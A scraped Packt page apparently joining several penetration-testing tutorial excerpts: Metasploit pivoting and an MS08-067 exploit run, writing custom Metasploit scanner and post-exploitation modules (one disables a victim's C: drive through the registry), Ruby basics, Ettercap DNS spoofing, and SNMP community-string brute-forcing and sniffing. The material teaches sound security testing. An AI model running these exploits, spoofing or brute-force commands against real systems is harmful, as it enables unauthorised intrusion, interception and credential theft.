we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot: Screen showing an example of what you should see once the exploit is complete and your session is created (the cropped text is not important) We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot: As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network. This is another reason why we chose the Meterpreter shell, it provides us with the capability to set the route up. In the shell, enter run autoroute –s 10.2.0.0/24 to set a route up to our 10 network. Once the command is complete, we will view our routing table and enter run autoroute –p to display the routing table. An example of this is shown in the following screenshot: As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will add a background to our session 1; press the Ctrl+ Z to background the session. We will use the scan capability from within our metasploit tool. Enter the following commands: use auxiliary/scanner/portscan/tcp set RHOSTS 10.2.0.0/24 set PORTS 139,445 set THREADS 50 run The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in metasploit. Enter nmap –sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149. An example of the results for this scan is shown in the following screenshot: We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Service Server buffer overflow. In the metasploit window, set the session in the background and enter the following commands: use exploit/windows/smb/ms08_067_netapi set RHOST 10.2.0.149 set PAYLOAD windows/meterpreter/bind_tcp exploit If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration on the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot: As the previous screenshot shows, the pivot was successful, and we now have another session open within metasploit. This is reflected with the Local Pipe | Remote Pipe reference. Once you complete reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot: Summary In this article, we looked at the powerful technique of establishing a pivot point from a client. Resources for Article: Further resources on this subject: Installation of Oracle VM VirtualBox on Linux [article] Using Virtual Destinations (Advanced) [article] Quick Start into Selenium Tests [article]
Read more
  • 0
  • 0
  • 3169

article-image-metasploit-custom-modules-and-meterpreter-scripting
Packt
03 Jun 2014
10 min read
Save for later

Metasploit Custom Modules and Meterpreter Scripting

Packt
03 Jun 2014
10 min read
(For more resources related to this topic, see here.) Writing out a custom FTP scanner module Let's try and build a simple module. We will write a simple FTP fingerprinting module and see how things work. Let's examine the code for the FTP module: require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Apex FTP Detector', 'Description' => '1.0', 'Author' => 'Nipun Jaswal', 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(21), ], self.class) End We start our code by defining the required libraries to refer to. We define the statement require 'msf/core' to include the path to the core libraries at the very first step. Then, we define what kind of module we are creating; in this case, we are writing an auxiliary module exactly the way we did for the previous module. Next, we define the library files we need to include from the core library set. Here, the include Msf::Exploit::Remote::Ftp statement refers to the /lib/msf/core/exploit/ftp.rb file and include Msf::Auxiliary::Scanner refers to the /lib/msf/core/auxiliary/scanner.rb file. We have already discussed the scanner.rb file in detail in the previous example. However, the ftp.rb file contains all the necessary methods related to FTP, such as methods for setting up a connection, logging in to the FTP service, sending an FTP command, and so on. Next, we define the information of the module we are writing and attributes such as name, description, author name, and license in the initialize method. We also define what options are required for the module to work. For example, here we assign RPORT to port 21 by default. Let's continue with the remaining part of the module: def run_host(target_host) connect(true, false) if(banner) print_status("#{rhost} is running #{banner}") end disconnect end end We define the run_host method, which will initiate the process of connecting to the target by overriding the run_host method from the /lib/msf/core/auxiliary/scanner.rb file. Similarly, we use the connect function from the /lib/msf/core/exploit/ftp.rb file, which is responsible for initializing a connection to the host. We supply two parameters into the connect function, which are true and false. The true parameter defines the use of global parameters, whereas false turns off the verbose capabilities of the module. The beauty of the connect function lies in its operation of connecting to the target and recording the banner of the FTP service in the parameter named banner automatically, as shown in the following screenshot: Now we know that the result is stored in the banner attribute. Therefore, we simply print out the banner at the end and we disconnect the connection to the target. This was an easy module, and I recommend that you should try building simple scanners and other modules like these. Nevertheless, before we run this module, let's check whether the module we just built is correct with regards to its syntax or not. We can do this by passing the module from an in-built Metasploit tool named msftidy as shown in the following screenshot: We will get a warning message indicating that there are a few extra spaces at the end of line number 19. Therefore, when we remove the extra spaces and rerun msftidy, we will see that no error is generated. This marks the syntax of the module to be correct. Now, let's run this module and see what we gather: We can see that the module ran successfully, and it has the banner of the service running on port 21, which is Baby FTP Server. For further reading on the acceptance of modules in the Metasploit project, refer to https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements. Writing out a custom HTTP server scanner Now, let's take a step further into development and fabricate something a bit trickier. We will create a simple fingerprinter for HTTP services, but with a slightly more complex approach. We will name this file http_myscan.rb as shown in the following code snippet: require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Server Service Detector', 'Description' => 'Detects Service On Web Server, Uses GET to Pull Out Information', 'Author' => 'Nipun_Jaswal', 'License' => MSF_LICENSE ) end We include all the necessary library files as we did for the previous modules. We also assign general information about the module in the initialize method, as shown in the following code snippet: def os_fingerprint(response) if not response.headers.has_key?('Server') return "Unknown OS (No Server Header)" end case response.headers['Server'] when /Win32/, /(Windows/, /IIS/ os = "Windows" when /Apache// os = "*Nix" else os = "Unknown Server Header Reporting: "+response.headers['Server'] end return os end def pb_fingerprint(response) if not response.headers.has_key?('X-Powered-By') resp = "No-Response" else resp = response.headers['X-Powered-By'] end return resp end def run_host(ip) connect res = send_request_raw({'uri' => '/', 'method' => 'GET' }) return if not res os_info=os_fingerprint(res) pb=pb_fingerprint(res) fp = http_fingerprint(res) print_status("#{ip}:#{rport} is running #{fp} version And Is Powered By: #{pb} Running On #{os_info}") end end The preceding module is similar to the one we discussed in the very first example. We have the run_host method here with ip as a parameter, which will open a connection to the host. Next, we have send_request_raw, which will fetch the response from the website or web server at / with a GET request. The result fetched will be stored into the variable named res. We pass the value of the response in res to the os_fingerprint method. This method will check whether the response has the Server key in the header of the response; if the Server key is not present, we will be presented with a message saying Unknown OS. However, if the response header has the Server key, we match it with a variety of values using regex expressions. If a match is made, the corresponding value of os is sent back to the calling definition, which is the os_info parameter. Now, we will check which technology is running on the server. We will create a similar function, pb_fingerprint, but will look for the X-Powered-By key rather than Server. Similarly, we will check whether this key is present in the response code or not. If the key is not present, the method will return No-Response; if it is present, the value of X-Powered-By is returned to the calling method and gets stored in a variable, pb. Next, we use the http_fingerprint method that we used in the previous examples as well and store its result in a variable, fp. We simply print out the values returned from os_fingerprint, pb_fingerprint, and http_fingerprint using their corresponding variables. Let's see what output we'll get after running this module: Msf auxiliary(http_myscan) > run [*]192.168.75.130:80 is running Microsoft-IIS/7.5 version And Is Powered By: ASP.NET Running On Windows [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Writing out post-exploitation modules Now, as we have seen the basics of module building, we can take a step further and try to build a post-exploitation module. A point to remember here is that we can only run a post-exploitation module after a target compromises successfully. So, let's begin with a simple drive disabler module which will disable C: at the target system: require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry def initialize super( 'Name' => 'Drive Disabler Module', 'Description' => 'C Drive Disabler Module', 'License' => MSF_LICENSE, 'Author' => 'Nipun Jaswal' ) End We started in the same way as we did in the previous modules. We have added the path to all the required libraries we need in this post-exploitation module. However, we have added include Msf::Post::Windows::Registry on the 5th line of the preceding code, which refers to the /core/post/windows/registry.rb file. This will give us the power to use registry manipulation functions with ease using Ruby mixins. Next, we define the type of module and the intended version of Metasploit. In this case, it is Post for post-exploitation and Metasploit3 is the intended version. We include the same file again because this is a single file and not a separate directory. Next, we define necessary information about the module in the initialize method just as we did for the previous modules. Let's see the remaining part of the module: def run key1="HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\" print_line("Disabling C Drive") meterpreter_registry_setvaldata(key1,'NoDrives','4','REG_DWORD') print_line("Setting No Drives For C") meterpreter_registry_setvaldata(key1,'NoViewOnDrives','4','REG_DWORD') print_line("Removing View On The Drive") print_line("Disabled C Drive") end end #class We created a variable called key1, and we stored the path of the registry where we need to create values to disable the drives in it. As we are in a meterpreter shell after the exploitation has taken place, we will use the meterpreter_registry_setval function from the /core/post/windows/registry.rb file to create a registry value at the path defined by key1. This operation will create a new registry key named NoDrives of the REG_DWORD type at the path defined by key1. However, you might be wondering why we have supplied 4 as the bitmask. To calculate the bitmask for a particular drive, we have a little formula, 2^([drive character serial number]-1) . Suppose, we need to disable the C drive. We know that character C is the third character in alphabets. Therefore, we can calculate the exact bitmask value for disabling the C drive as follows: 2^ (3-1) = 2^2= 4 Therefore, the bitmask is 4 for disabling C:. We also created another key, NoViewOnDrives, to disable the view of these drives with the exact same parameters. Now, when we run this module, it gives the following output: So, let's see whether we have successfully disabled C: or not: Bingo! No C:. We successfully disabled C: from the user's view. Therefore, we can create as many post-exploitation modules as we want according to our need. I recommend you put some extra time toward the libraries of Metasploit. Make sure you have user-level access rather than SYSTEM for the preceding script to work, as SYSTEM privileges will not create the registry under HKCU. In addition to this, we have used HKCU instead of writing HKEY_CURRENT_USER, because of the inbuilt normalization that will automatically create the full form of the key. I recommend you check the registry.rb file to see the various available methods.
Read more
  • 0
  • 0
  • 5759
article-image-ruby-and-metasploit-modules
Packt
23 May 2014
11 min read
Save for later

Ruby and Metasploit Modules

Packt
23 May 2014
11 min read
(For more resources related to this topic, see here.) Reinventing Metasploit Consider a scenario where the systems under the scope of the penetration test are very large in number, and we need to perform a post-exploitation function such as downloading a particular file from all the systems after exploiting them. Downloading a particular file from each system manually will consume a lot of time and will be tiring as well. Therefore, in a scenario like this, we can create a custom post-exploitation script that will automatically download a file from all the systems that are compromised. This article focuses on building programming skill sets for Metasploit modules. This article kicks off with the basics of Ruby programming and ends with developing various Metasploit modules. In this article, we will cover the following points: Understanding the basics of Ruby programming Writing programs in Ruby programming Exploring modules in Metasploit Writing your own modules and post-exploitation modules Let's now understand the basics of Ruby programming and gather the required essentials we need to code Metasploit modules. Before we delve deeper into coding Metasploit modules, we must know the core features of Ruby programming that are required in order to design these modules. However, why do we require Ruby for Metasploit? The following key points will help us understand the answer to this question: Constructing an automated class for reusable code is a feature of the Ruby language that matches the needs of Metasploit Ruby is an object-oriented style of programming Ruby is an interpreter-based language that is fast and consumes less development time Earlier, Perl used to not support code reuse Ruby – the heart of Metasploit Ruby is indeed the heart of the Metasploit framework. However, what exactly is Ruby? According to the official website, Ruby is a simple and powerful programming language. Yokihiru Matsumoto designed it in 1995. It is further defined as a dynamic, reflective, and general-purpose object-oriented programming language with functions similar to Perl. You can download Ruby for Windows/Linux from http://rubyinstaller.org/downloads/. You can refer to an excellent resource for learning Ruby practically at http://tryruby.org/levels/1/challenges/0. Creating your first Ruby program Ruby is an easy-to-learn programming language. Now, let's start with the basics of Ruby. However, remember that Ruby is a vast programming language. Covering all the capabilities of Ruby will push us beyond the scope of this article. Therefore, we will only stick to the essentials that are required in designing Metasploit modules. Interacting with the Ruby shell Ruby offers an interactive shell too. Working on the interactive shell will help us understand the basics of Ruby clearly. So, let's get started. Open your CMD/terminal and type irb in it to launch the Ruby interactive shell. Let's input something into the Ruby shell and see what happens; suppose I type in the number 2 as follows: irb(main):001:0> 2 => 2 The shell throws back the value. Now, let's give another input such as the addition operation as follows: irb(main):002:0> 2+3 => 5 We can see that if we input numbers using an expression style, the shell gives us back the result of the expression. Let's perform some functions on the string, such as storing the value of a string in a variable, as follows: irb(main):005:0> a= "nipun" => "nipun" irb(main):006:0> b= "loves metasploit" => "loves metasploit" After assigning values to the variables a and b, let's see what the shell response will be when we write a and a+b on the shell's console: irb(main):014:0> a => "nipun" irb(main):015:0> a+b => "nipunloves metasploit" We can see that when we typed in a as an input, it reflected the value stored in the variable named a. Similarly, a+b gave us back the concatenated result of variables a and b. Defining methods in the shell A method or function is a set of statements that will execute when we make a call to it. We can declare methods easily in Ruby's interactive shell, or we can declare them using the script as well. Methods are an important aspect when working with Metasploit modules. Let's see the syntax: def method_name [( [arg [= default]]...[, * arg [, &expr ]])] expr end To define a method, we use def followed by the method name, with arguments and expressions in parentheses. We also use an end statement following all the expressions to set an end to the method definition. Here, arg refers to the arguments that a method receives. In addition, expr refers to the expressions that a method receives or calculates inline. Let's have a look at an example: irb(main):001:0> def week2day(week) irb(main):002:1> week=week*7 irb(main):003:1> puts(week) irb(main):004:1> end => nil We defined a method named week2day that receives an argument named week. Further more, we multiplied the received argument with 7 and printed out the result using the puts function. Let's call this function with an argument with 4 as the value: irb(main):005:0> week2day(4) 28 => nil We can see our function printing out the correct value by performing the multiplication operation. Ruby offers two different functions to print the output: puts and print. However, when it comes to the Metasploit framework, the print_line function is used. Variables and data types in Ruby A variable is a placeholder for values that can change at any given time. In Ruby, we declare a variable only when we need to use it. Ruby supports numerous variables' data types, but we will only discuss those that are relevant to Metasploit. Let's see what they are. Working with strings Strings are objects that represent a stream or sequence of characters. In Ruby, we can assign a string value to a variable with ease as seen in the previous example. By simply defining the value in quotation marks or a single quotation mark, we can assign a value to a string. It is recommended to use double quotation marks because if single quotations are used, it can create problems. Let's have a look at the problem that may arise: irb(main):005:0> name = 'Msf Book' => "Msf Book" irb(main):006:0> name = 'Msf's Book' irb(main):007:0' ' We can see that when we used a single quotation mark, it worked. However, when we tried to put Msf's instead of the value Msf, an error occurred. This is because it read the single quotation mark in the Msf's string as the end of single quotations, which is not the case; this situation caused a syntax-based error. The split function We can split the value of a string into a number of consecutive variables using the split function. Let's have a look at a quick example that demonstrates this: irb(main):011:0> name = "nipun jaswal" => "nipun jaswal" irb(main):012:0> name,surname=name.split(' ') => ["nipun", "jaswal"] irb(main):013:0> name => "nipun" irb(main):014:0> surname => "jaswal" Here, we have split the value of the entire string into two consecutive strings, name and surname by using the split function. However, this function split the entire string into two strings by considering the space to be the split's position. The squeeze function The squeeze function removes extra spaces from the given string, as shown in the following code snippet: irb(main):016:0> name = "Nipun Jaswal" => "Nipun Jaswal" irb(main):017:0> name.squeeze => "Nipun Jaswal" Numbers and conversions in Ruby We can use numbers directly in arithmetic operations. However, remember to convert a string into an integer when working on user input using the .to_i function. Simultaneously, we can convert an integer number into a string using the .to_s function. Let's have a look at some quick examples and their output: irb(main):006:0> b="55" => "55" irb(main):007:0> b+10 TypeError: no implicit conversion of Fixnum into String from (irb):7:in `+' from (irb):7 from C:/Ruby200/bin/irb:12:in `<main>' irb(main):008:0> b.to_i+10 => 65 irb(main):009:0> a=10 => 10 irb(main):010:0> b="hello" => "hello" irb(main):011:0> a+b TypeError: String can't be coerced into Fixnum from (irb):11:in `+' from (irb):11 from C:/Ruby200/bin/irb:12:in `<main>' irb(main):012:0> a.to_s+b => "10hello" We can see that when we assigned a value to b in quotation marks, it was considered as a string, and an error was generated while performing the addition operation. Nevertheless, as soon as we used the to_i function, it converted the value from a string into an integer variable, and addition was performed successfully. Similarly, with regards to strings, when we tried to concatenate an integer with a string, an error showed up. However, after the conversion, it worked. Ranges in Ruby Ranges are important aspects and are widely used in auxiliary modules such as scanners and fuzzers in Metasploit. Let's define a range and look at the various operations we can perform on this data type: irb(main):028:0> zero_to_nine= 0..9 => 0..9 irb(main):031:0> zero_to_nine.include?(4) => true irb(main):032:0> zero_to_nine.include?(11) => false irb(main):002:0> zero_to_nine.each{|zero_to_nine| print(zero_to_nine)} 0123456789=> 0..9 irb(main):003:0> zero_to_nine.min => 0 irb(main):004:0> zero_to_nine.max => 9 We can see that a range offers various operations such as searching, finding the minimum and maximum values, and displaying all the data in a range. Here, the include? function checks whether the value is contained in the range or not. In addition, the min and max functions display the lowest and highest values in a range. Arrays in Ruby We can simply define arrays as a list of various values. Let's have a look at an example: irb(main):005:0> name = ["nipun","james"] => ["nipun", "james"] irb(main):006:0> name[0] => "nipun" irb(main):007:0> name[1] => "james" So, up to this point, we have covered all the required variables and data types that we will need for writing Metasploit modules. For more information on variables and data types, refer to the following link: http://www.tutorialspoint.com/ruby/ Refer to a quick cheat sheet for using Ruby programming effectively at the following links: https://github.com/savini/cheatsheets/raw/master/ruby/RubyCheat.pdf http://hyperpolyglot.org/scripting Methods in Ruby A method is another name for a function. Programmers with a different background than Ruby might use these terms interchangeably. A method is a subroutine that performs a specific operation. The use of methods implements the reuse of code and decreases the length of programs significantly. Defining a method is easy, and their definition starts with the def keyword and ends with the end statement. Let's consider a simple program to understand their working, for example, printing out the square of 50: def print_data(par1) square = par1*par1 return square end answer=print_data(50) print(answer) The print_data method receives the parameter sent from the main function, multiplies it with itself, and sends it back using the return statement. The program saves this returned value in a variable named answer and prints the value. Decision-making operators Decision making is also a simple concept as with any other programming language. Let's have a look at an example: irb(main):001:0> 1 > 2 => false irb(main):002:0> 1 < 2 => true Let's also consider the case of string data: irb(main):005:0> "Nipun" == "nipun" => false irb(main):006:0> "Nipun" == "Nipun" => true Let's consider a simple program with decision-making operators: #Main num = gets num1 = num.to_i decision(num1) #Function def decision(par1) print(par1) par1= par1 if(par1%2==0) print("Number is Even") else print("Number is Odd") end end We ask the user to enter a number and store it in a variable named num using gets. However, gets will save the user input in the form of a string. So, let's first change its data type to an integer using the to_i method and store it in a different variable named num1. Next, we pass this value as an argument to the method named decision and check whether the number is divisible by two. If the remainder is equal to zero, it is concluded that the number is divisible by true, which is why the if block is executed; if the condition is not met, the else block is executed. The output of the preceding program will be something similar to the following screenshot when executed in a Windows-based environment:
Read more
  • 0
  • 0
  • 7708

article-image-network-exploitation-and-monitoring
Packt
22 May 2014
8 min read
Save for later

Network Exploitation and Monitoring

Packt
22 May 2014
8 min read
(For more resources related to this topic, see here.) Man-in-the-middle attacks Using ARP abuse, we can actually perform more elaborate man-in-the-middle (MITM)-style attacks building on the ability to abuse address resolution and host identification schemes. This section will focus on the methods you can use to do just that. MITM attacks are aimed at fooling two entities on a given network into communicating by the proxy of an unauthorized third party, or allowing a third party to access information in transit, being communicated between two entities on a network. For instance, when a victim connects to a service on the local network or on a remote network, a man-in-the-middle attack will give you as an attacker the ability to eavesdrop on or even augment the communication happening between the victim and its service. By service, we could mean a web (HTTP), FTP, RDP service, or really anything that doesn't have the inherent means to defend itself against MITM attacks, which turns out to be quite a lot of the services we use today! Ettercap DNS spoofing Ettercap is a tool that facilitates a simple command line and graphical interface to perform MITM attacks using a variety of techniques. In this section, we will be focusing on applications of ARP spoofing attacks, namely DNS spoofing. You can set up a DNS spoofing attack with ettercap by performing the following steps: Before we get ettercap up and running, we need to modify the file that holds the DNS records for our soon-to-be-spoofed DNS server. This file is found under /usr/share/ettercap/etter.dns. What you need to do is either add DNS name and IP addresses or modify the ones currently in the file by replacing all the IPs with yours, if you'd like to act as the intercepting host. Now that our DNS server records are set up, we can invoke ettercap. Invoking ettercap is pretty straightforward; here's the usage specification: ettercap [OPTIONS] [TARGET1] [TARGET2] To perform a MITM attack using ettercap, you need to supply the –M switch and pass it an argument indicating the MITM method you'd like to use. In addition, you will also need to specify that you'd like to use the DNS spoofing plugin. Here's what the invocation will look like: ettercap –M arp:remote –P dns_spoof [TARGET1] [TARGET2] Where TARGET1 and TARGET2 is the host you want to intercept and either the default gateway or DNS server, interchangeably. To target the host at address 192.168.10.106 with a default gateway of 192.168.10.1, you will invoke the following command: ettercap –M arp:remote –P dns_spoof /192.168.10.107//192.168.10.1/ Once launched, ettercap will begin poisoning the ARP tables of the specified hosts and listen for any DNS requests to the domains it's configured to resolve. Interrogating servers For any network device to participate in communication, certain information needs to be accessible to it, no device will be able to look up a domain name or find an IP address without the participation of devices in charge of certain information. In this section, we will detail some techniques you can use to interrogate common network components for sensitive information about your target network and the hosts on it. SNMP interrogation The Simple Network Management Protocol (SNMP) is used by routers and other network components in order to support remote monitoring of things such as bandwidth, CPU/Memory usage, hard disk space usage, logged on users, running processes, and a number of other incredibly sensitive collections of information. Naturally, any penetration tester with an exposed SNMP service on their target network will need to know how to proliferate any potentially useful information from it. About SNMP Security SNMP services before Version 3 are not designed with security in mind. Authentication to these services often comes in the form a simple string of characters called a community string. Another common implementation flaw that is inherent to SNMP Version 1 and 2 is the ability to brute-force and eavesdrop on communication. To enumerate SNMP servers for information using the Kali Linux tools, you could resort to a number of techniques. The most obvious one will be snmpwalk, and you can use it by using the following command: snmpwalk –v [1 | 2c | 3 ] –c [community string] [target host] For example, let's say we were targeting 192.168.10.103 with a community string of public, which is a common community string setting; you will then invoke the following command to get information from the SNMP service: snmpwalk –v 1 –c public 192.168.10.103 Here, we opted to use SNMP Version 1, hence the –v 1 in the invocation for the preceding command. The output will look something like the following screenshot: As you can see, this actually extracts some pretty detailed information about the targeted host. Whether this is a critical vulnerability or not will depend on which kind of information is exposed. On Microsoft Windows machines and some popular router operating systems, SNMP services could expose user credentials and even allow remote attackers to augment them maliciously, should they have write access to the SNMP database. Exploiting SNMP successfully is often strongly depended on the device implementing the service. You could imagine that for routers, your target will probably be the routing table or the user accounts on the device. For other host types, the attack surface may be quite different. Try to assess the risk of SNMP-based flaws and information leaks with respect to its host and possibly the wider network it's hosted on. Don't forget that SNMP is all about sharing information, information that other hosts on your network probably trust. Think about the kind of information accessible and what you will be able to do with it should you have the ability to influence it. If you can attack the host, attack the hosts that trust it. Another collection of tools is really great at collecting information from SNMP services: the snmp_enum, snmp_login, and similar scripts available in the Metasploit Framework. The snmp_enum script pretty much does exactly what snmpwalk does except it structures the extracted information in a friendlier format. This makes it easier to understand. Here's an example: msfcli auxiliary/scanner/snmp/snmp_enum [OPTIONS] [MODE] The options available for this module are shown in the following screenshot: Here's an example invocation against the host in our running example: msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=192.168.10.103 The preceding command produces the following output: You will notice that we didn't specify the community string in the invocation. This is because the module assumes a default of public. You can specify a different one using the COMMUNITY parameter. In other situations, you may not always be lucky enough to preemptively know the community string being used. However, luckily SNMP Version 1, 2, 2c, and 3c do not inherently have any protection against brute-force attacks, nor do any of them use any form of network based encryption. In the case of SNMP Version 1 and 2c, you could use a nifty Metasploit module called snmp-login that will run through a list of possible community strings and determine the level of access the enumerated strings gives you. You can use it by running the following command: msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=192.168.10.103 The preceding command produces the following output: As seen in the preceding screenshot, once the run is complete it will list the enumerated strings along with the level of access granted. The snmp_login module uses a static list of possible strings to do its enumeration by default, but you could also run this module on some of the password lists that ship with Kali Linux, as follows: msfcli auxiliary/scanner/snmp/snmp_login PASS_FILE=/usr/share/wordlists/ rockyou.txt RHOSTS=192.168.10.103 This will use the rockyou.txt wordlist to look for strings to guess with. Because all of these Metasploit modules are command line-driven, you can of course combine them. For instance, if you'd like to brute-force a host for the SNMP community strings and then run the enumeration module on the strings it finds, you can do this by crafting a bash script as shown in the following example: #!/bin/bash if [ $# != 1 ] then echo "USAGE: . snmp [HOST]" exit 1 fi TARGET=$1 echo "[*] Running SNMP enumeration on '$TARGET'" for comm_string in `msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=$TARGET E 2> /dev/null | awk -F' '/access with community/ { print $2 }'`; do echo "[*] found community string '$comm_string' ...running enumeration"; msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=$TARGET COMMUNITY=$comm_string E 2> /dev/null; done The following command shows you how to use it: . snmp.sh [TAGRET] In our running example, it is used as follows: . snmp.sh 192.168.10.103 Other than guessing or brute-forcing SNMP community strings, you could also use TCPDump to filter out any packets that could contain unencrypted SNMP authentication information. Here's a useful example: tcpdump udp port 161 –i eth0 –vvv –A The preceding command will produce the following output: Without going too much into detail about the SNMP packet structure, looking through the printable strings captured, it's usually pretty easy to see the community string. You may also want to look at building a more comprehensive packet-capturing tool using something such as Scapy, which is available in Kali Linux versions.
Read more
  • 0
  • 0
  • 2784